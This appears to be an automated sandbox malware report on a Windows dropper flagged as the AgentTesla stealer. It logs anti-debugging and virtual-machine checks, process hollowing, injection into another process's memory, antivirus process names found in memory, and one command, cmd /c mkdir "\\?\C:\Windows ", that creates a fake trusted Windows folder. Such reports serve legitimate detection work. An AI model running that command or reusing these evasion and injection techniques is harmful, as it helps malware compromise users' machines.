Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98398	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98286	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98159	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98032	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97904	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97791	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97680	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97568	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97441	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97313	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99864	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99729	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99604	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99483	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99371	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99255	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99128	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98882	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98769	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98650	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98531	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99891
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99778
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99671
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99547
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99438
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99297
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99188
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99078
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98969
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98828
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98719
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98594
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98484
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98375
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98266
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98156
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98047
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97938
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97813
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97695
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97594
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97469
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97359
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99874
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99725
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98271
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98140
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 98031
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97921
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97812
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97703
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97593
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97484
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97375
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97265
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97156
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 97046
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96937
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96827
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96718
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96609
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96500
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96390
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96281
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 96171
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99875
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99765
Source: C:\Users\Public\Libraries\srcngmlC.pif	Thread delayed: delay time: 99656

Source: Clmgncrs.PIF, 00000006.00000003.1833585649.0000000000744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`4x%SystemRoot%\system32\mswsock.dll
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXY
Source: srcngmlC.pif, 00000005.00000002.1879294408.0000000034539000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000981000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000003.1833585649.0000000000772000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000981000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: srcngmlC.pif, 0000000C.00000003.1939917253.00000000412EA000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1940042519.0000000041305000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	API call chain: ExitProcess graph end node	graph_0-52315
Source: C:\Users\Public\Libraries\srcngmlC.pif	API call chain: ExitProcess graph end node	graph_5-56200
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	API call chain: ExitProcess graph end node	graph_6-39965
Source: C:\Users\Public\Libraries\srcngmlC.pif	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\srcngmlC.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Libraries\srcngmlC.pif

Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_0040CE09

Source: C:\Users\Public\Libraries\srcngmlC.pif

5_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029EFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_029EFCD8

Source: C:\Users\Public\Libraries\srcngmlC.pif

Code function: 5_2_0040ADB0 GetProcessHeap,HeapFree,

5_2_0040ADB0

Source: C:\Users\Public\Libraries\srcngmlC.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040CE09
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040E61C
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00416F6A
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_004123F1 SetUnhandledExceptionFilter,	5_2_004123F1
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_1_0040CE09
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_1_0040E61C
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_1_00416F6A
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_004123F1 SetUnhandledExceptionFilter,	5_1_004123F1
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040CE09
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0040E61C
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00416F6A
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_004123F1 SetUnhandledExceptionFilter,	8_2_004123F1

Source: C:\Users\Public\Libraries\srcngmlC.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Memory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Memory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 18140000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Memory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Memory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 18140000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Memory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Memory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 1E090000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Section unmapped: C:\Users\Public\Libraries\srcngmlC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section unmapped: C:\Users\Public\Libraries\srcngmlC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Section unmapped: C:\Users\Public\Libraries\srcngmlC.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Memory written: C:\Users\Public\Libraries\srcngmlC.pif base: 24D008	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Memory written: C:\Users\Public\Libraries\srcngmlC.pif base: 3BB008	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Memory written: C:\Users\Public\Libraries\srcngmlC.pif base: 22C008

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029D5DDC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: GetLocaleInfoA,	0_2_029DB8C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: GetLocaleInfoA,	0_2_029DB910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029D5EE8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: GetLocaleInfoA,	5_2_00417A20
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: GetLocaleInfoA,	5_1_00417A20
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_02985DDC
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: GetLocaleInfoA,	6_2_0298B910
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_02985EE7
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: GetLocaleInfoA,	8_2_00417A20

Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\srcngmlC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029DA30C GetLocalTime,

0_2_029DA30C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_02A395F8 GetVersion,

0_2_02A395F8

Source: C:\Users\Public\Libraries\srcngmlC.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: cmdagent.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: quhlpsvc.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: avgamsvr.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: TMBMSRV.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: Vsserv.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: avgupsvc.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: avgemc.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE
